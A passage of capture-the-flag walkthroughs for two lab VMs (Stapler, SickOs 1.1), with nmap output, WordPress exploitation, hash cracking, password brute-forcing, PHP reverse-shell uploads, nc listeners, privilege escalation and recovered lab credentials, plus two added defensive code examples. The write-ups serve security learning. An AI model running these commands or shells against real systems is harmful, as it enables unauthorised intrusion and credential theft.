21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (EdDSA)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   tcpwrapped
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 9
|   Capabilities flags: 63487
|   Some Capabilities: LongPassword, Support41Auth, ConnectWithDatabase, SupportsCompression, FoundRows, SupportsTransactions, ODBCClient, DontAllowDatabaseTableColumn, IgnoreSigpipes, Speaks41ProtocolOld, LongColumnFlag, InteractiveClient, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: 12^\x151zj\x12N%Rxm-R\x1Ba/8E
|_  Auth Plugin Name: 88
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 5h29m56s, deviation: 0s, median: 5h29m56s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2020-04-20T23:18:17+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-21 03:48:17
|_  start_date: 1601-01-01 05:53:28


********************************** We could enumerate our findings further; however, I really like web, so I will begin my enumeration there. Let's browse to
192.168.56.4:12380
I didn't find anything in robots.txt; however, in the source code there are a few things that might interest you too 🙂 I must admit that when I saw the base64-encoded link, I thought "yes, this is it" and tried various ways to get around it. Nevertheless, download the image using curl (wget didn't work for me, I don't get why..)
curl http://192.168.56.4:12380/images/default.jpg -o default.jpg
Yes, I am gonna run exiftool on it. I found Zoe while reading the source code, and now Tim. I think it is a good idea to collect these names in a separate file. Who knows, we could use them for brute forcing. I ran gobuster with my favorite wordlist to check for any directories; it's taking a lot of time, so I ran nikto alongside it. I am afraid I might not get anything in the end.
gobuster dir -u http://192.168.56.4:12380 -w /usr/share/wordlists/directory-list-2.3-medium.txt -o gobuster12380.log
nikto -h http://192.168.56.4:12380 > nikto12380.log
To be honest, I was not able to get any concrete result. Therefore, I took some time off and watched a few entertainment videos (usually I like cooking videos because I like to cook and experiment with new foods. By the way, I am a Lacto-Ovo Veg guy). After resuming, I still couldn't come up with anything new; however, recently I began to watch ippsec videos (which were awesome) and I remembered him extracting a domain name from an SSL certificate. Therefore, I tried to put https:// in the link, and guess what I got? robots.txt.
https://192.168.56.4:12380/robots.txt
Since blogblog is a WordPress-based website, I ran wpscan against it. However, I was not able to enumerate its plugins and their versions. I had to read a couple of blog posts and check their official GitHub. I even installed the WordPress tool written in Python, and it appeared to me that it is still in development, so not many functionalities were present and it didn't help much. Finally, I found in their official documentation that the plugins show up if we run the command with the --stealthy and --plugins-detection options:
wpscan --stealthy --url https://192.168.56.4:12380/blogblog/ --plugins-detection aggressive -o wp_report.log
I tried to google the plugins and found that the highlighted plugin has a local file inclusion vulnerability. The exploit looks a little buggy, because I tried it with both python2 and python3. Its execution did not complete, but when I browsed back to the homepage I could see a new post entry and I was glad that it did inject something there. In the past, when I had to exploit a kernel, many exploits didn't complete their execution but I still got root. Likewise, I am a little hopeful here as well. (Nevertheless, I reminded myself that I will need to go through the exploit again if I am left with no other option.) I was not happy, thought I'd give it a try to fix the exploit, and finally I was able to fix it by embedding two lines of code (Yeh!!), which make Python's HTTPS client skip certificate verification:
import ssl
# make urllib accept the site's certificate by turning off TLS verification for the whole process
ssl._create_default_https_context = ssl._create_unverified_context
I have collected quite a good number of users, both through manual enumeration and wpscan results. So, my backup plan is to run a brute force. However, let me check the uploads folder first.
https://192.168.56.4:12380/blogblog/wp-content/uploads/
It's customary for me that when I find an image, I run exiftool on it and if it looks normal, I leave it. Else, I run the strings command to take the analysis further. First image: Second image: And we can see that it is a PHP file. After running the strings command, we got credentials to the MySQL database.
mysql -uroot -pplbkac -h 192.168.56.4

show databases; 
use wordpress;
show tables;
select * from wp_users;
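The exiftool-then-strings routine described above, and the "shell.php.jpg" trick the author tries later against the upload filter, are both instances of one check: does the content of an "image" match what its name claims, and is there PHP inside it? The following is an added example, not code from the write-up, that automates that check for an uploads folder: it compares each file's magic bytes with its extension, flags double extensions with an inner php part, and searches the body (EXIF comments included) for a PHP open tag. The sample files are constructed, not taken from the box.

```python
"""Inspect files from a web uploads folder: does the content match the
extension, and is there PHP hidden inside an 'image'? Added example, not
from the write-up; the sample files below are constructed."""
import re

# Leading bytes of the image formats an uploads folder is expected to hold.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
EXT_TO_TYPE = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}
# Matches "<?php" and the short echo tag "<?=" anywhere in the body (EXIF comments included).
PHP_TAG = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)


def sniff_type(data):
    """Return the image type implied by the magic bytes, or None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def inspect_upload(name, data):
    """Return a list of problems; an empty list means the file looks like a plain image."""
    problems = []
    parts = name.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    expected = EXT_TO_TYPE.get(ext)
    actual = sniff_type(data)
    if expected is None:
        problems.append(f"extension '{ext}' is not an allowed image type")
    elif actual != expected:
        problems.append(f"magic bytes say {actual or 'unknown'}, extension says {expected}")
    # shell.php.jpg style names: an inner extension starting with php
    if any(p.startswith("php") for p in parts[1:-1]):
        problems.append("double extension containing php")
    if PHP_TAG.search(data):
        problems.append("PHP open tag found in file body")
    return problems


def scan_folder(files):
    """files: {name: bytes}. Returns {name: problems} for the files with any problem."""
    report = {name: inspect_upload(name, data) for name, data in files.items()}
    return {name: probs for name, probs in report.items() if probs}


# Constructed samples (not real files from the box).
SAMPLES = {
    "default.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,               # ordinary JPEG header
    "banner.gif": b"GIF89a" + b"\x00" * 8 + b"<?php phpinfo(); ?>",  # PHP after a valid GIF header
    "shell.php.jpg": b"<?php phpinfo(); ?>",                          # no image header at all
    "notes.txt": b"just text",
}

if __name__ == "__main__":
    for name, probs in scan_folder(SAMPLES).items():
        print(name, "->", "; ".join(probs))
```

The second sample is the case that defeats an extension-only filter: a real GIF header followed by PHP, which is why the body scan is kept separate from the magic-byte comparison. Run it over a real uploads directory by reading each file into the dict with its basename as the key.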
I copied all the hashes to a file called hash.txt and planned to crack them using hashcat. Luckily I have my notes which I took from ippsec videos.
hashcat --example-hashes | less
Since our hash begins with $P$, I searched for this pattern and found MODE: 400
hashcat -m 400 hash.txt  /usr/share/wordlists/rockyou.txt --force
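What mode 400 is actually computing is phpass's "portable" hash, the scheme WordPress stores in wp_users.user_pass. The following is an added example, not part of the write-up, that implements the $P$ format in pure Python so the layout of the string is visible ($P$, one cost character, an 8-character salt, a 22-character encoded digest) and verifies a password against it. The salt "saltsalt" in the demo is a constructed value; the password is the one the write-up later recovers.

```python
"""phpass 'portable' hashes ($P$ / $H$), the scheme hashcat calls mode 400 and
WordPress used for wp_users.user_pass. Added example, not from the write-up.
Layout: $P$ + cost char + 8-char salt + 22-char encoded MD5 digest = 34 chars."""
import hashlib
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def encode64(data, count):
    """phpass's own base64 variant: 6-bit groups taken little-endian, no padding."""
    out, i = [], 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password, salt=None, count_log2=13):
    """MD5(salt+pw), then 2**count_log2 rounds of MD5(prev+pw). WordPress's
    default cost character is 'B', i.e. count_log2 = 13 = 8192 rounds."""
    if not 7 <= count_log2 <= 30:
        raise ValueError("count_log2 must be between 7 and 30")
    if salt is None:
        salt = encode64(os.urandom(6), 6)  # 6 random bytes -> 8 itoa64 characters
    if len(salt) != 8:
        raise ValueError("salt must be exactly 8 characters")
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return "$P$" + ITOA64[count_log2] + salt + encode64(digest, 16)


def phpass_verify(password, stored):
    """Recompute with the stored cost and salt; $H$ (phpBB) is the same scheme."""
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$") or stored[3] not in ITOA64:
        return False
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:
        return False
    candidate = phpass_hash(password, stored[4:12], count_log2)
    return candidate[3:] == stored[3:]


def rounds(stored):
    """Work factor encoded in position 3; a few thousand MD5s is why mode 400 cracks fast."""
    return 1 << ITOA64.index(stored[3])


if __name__ == "__main__":
    # Constructed demo: the salt is made up, the password is the one from the write-up.
    h = phpass_hash("incorrect", salt="saltsalt")
    print(h, rounds(h), phpass_verify("incorrect", h))
```

Two things the output makes concrete: the salt is stored in the clear inside the hash, so a cracker only has to run the MD5 chain once per candidate, and the whole cost is 8192 unsalted MD5 iterations, which is why a wordlist like rockyou gets through quickly even on a laptop.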
I got a few low-privileged users' cracked passwords. Right now, I am at the foothills of the Himalaya and the weather is quite cold during the night (especially); however, my laptop is emitting heat like a little fireplace and the fan is roaring loud. I had to play around with the incomplete result I got. I tried them all, and all of them have very limited access. I know that based on the ID assignment of WordPress users, 99.99% of the time, ID 1 is the admin user. If we assume this logic then user john is the admin. I am afraid to put my poor laptop to the test. So I had to find another way, which is to use wpscan to brute force the user's password.
 wpscan --url https://192.168.56.4:12380/blogblog --passwords /usr/share/wordlists/rockyou.txt --usernames john --max-threads 50 --disable-tls-checks
john: incorrect
Yes, user john is the admin with password incorrect. You will get almost all the shells from pentest monkey.
Method 1: Paste the shell into 404.php (Failed). Usually I try to modify the 404.php file and paste the shell there. However, this time it is quite peculiar that I can't find the update button lol
Method 2: Upload a shell.php.jpg with GIF98 (Failed)
Method 3: Creating a plugin or theme. Yeah!! Sometimes it might not work; in order for it to work, you need to have a plugin (or theme) header like this. I just copied the header from a plugin which already exists on the site and pasted it into my shell. Usually we need to zip it and upload it. However, I am not sure why, but on this box it worked even without zipping. By the way, it may ask you for FTP credentials. You just enter
host: 192.168.56.4 
User: anonymous 
Password: anonymous
I checked whether it is working a second time because, first, we already know from the nmap result that anonymous FTP works. You don't have to wait long (though the system may appear as if it is taking time to load). Go to the uploads folder to check your shell. After this, you need to wait for the reverse connection on your host machine through nc.
nc -lvp 1234
As soon as you click shell.php, you get a reverse connection (PoC: Proof of Concept). Finally I got a shell. Now I need to do privilege escalation to get root access and find the flag, if there is any. I tried to find SUID binaries, checked entries in /etc/crontab, whether /etc/passwd is writable, etc.. No luck 🙁 So I uploaded LinEnum.sh (Linux privilege escalation script) and planted it in the /tmp folder. Guess what I found... Possible Path 1: Possible Path 2: Let's first follow Path 1:
ssh JKanode@192.168.56.4   # it doesn't have the sudo privilege, let's waste no time here
ssh peter@192.168.56.4
Yippy! We got root and the flag!! Second Path: A (Failed) I found that the currently running kernel is vulnerable to privilege escalation and the exploit is available on exploit-db. The link is here. By reading the exploit, I came to know that it has two programs in it: decr.c and pwn.c. These highlighted passages explain how to run the exploit.
gcc decr.c -m32 -O2 -o decr

./decr 
I think it is going to take a while.. going to have a shower 🙂 Oops!! It didn't work.. For the time being, I will be happy with the root that I got previously, because I need to work now 🙂 Second Path: B Yeh!!
cat /etc/os-release
The source of the exploit is here. We need to read the above screenshot very carefully because it mentions how to use the exploit and how long you have to wait for the execution to be over. (You will notice that I typed many id(s)) lol. Transfer the exploit to the victim or target machine. And the flag is here. Yeh!! Note: I didn't write up all those rabbit holes... because some trolls were so good that I felt as if I was going to get something after this or that lol. Especially when I got the backup files and other secret notes.. I learned quite a lot from this box.
samdup, tcert

Walkthrough for SickOs 1.1

Firstly we need to know the target machine's IP address. I know three ways to get it, but in this write-up I will go with the one which I picked up recently. By the way, my host IP address is 192.168.56.1
sudo arp-scan --interface=vboxnet0 192.168.56.1/24
Target Machine IP: 192.168.56.3. Now we need to know what services, ports etc. are running on the machine.
nmap -sC -sV -p- -Pn 192.168.56.3/24 -oN nmap.log
We can clearly see that it is running:
1. SSH on port 22
2. Squid HTTP proxy on port 3128
I had to struggle a little with the Squid proxy because I thought too much about its functionalities and a lot of other stuff.. I was a little disappointed with gobuster; however, nikto really helped me here.
nikto -h http://192.168.56.3 -useproxy http://192.168.56.3:3128
I am happy that it ran, but it didn't give me anything important. Without proxy: Hats off to FoxyProxy, it made my life easy. After setting it up, we got access to the website. There isn't anything in the source code.
Browse http://192.168.56.3/wolfcms/?about-us.html
I visited almost all the pages and links and saw that there is a ? in all the URLs: http://192.168.56.3/wolfcms/? Besides, every CMS has an admin panel login, like wp-login.php or wp-admin for WordPress and admin for Joomla. Likewise, I tried login and admin, and finally the admin parameter redirected me to the login page.
Visit  http://192.168.56.3/wolfcms/?/admin/login
I tried admin:password and admin:admin as username and password respectively, and admin:admin did log in. Then I didn't bother much, as soon as I saw the Home page with PHP code written in it. I pasted a PHP reverse shell, and it did work for me. On my host machine, I am waiting for a reverse connection from the above CMS.
nc -lvp 9000
As soon as I visit the Homepage, I got a reverse connection.
python -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm
From the above, we can conclude that there is a user called sickos. And since we know that a CMS is running, it is likely there is a file which contains the database credentials, like wp-config.php in WordPress. Username: root and sickos (which we got from the above enumeration); password: john@123. I tried an ssh connection with the above credentials. Only sickos@192.168.56.3 worked, with the password john@123. Every time, as soon as I get ssh, I like to check the privileges of the user with sudo -l. The current user has sudo permission allowed. We got the flag, finally 🙂 It's almost 11PM here, I think now I can have a good night's sleep 🙂
samdup, tcert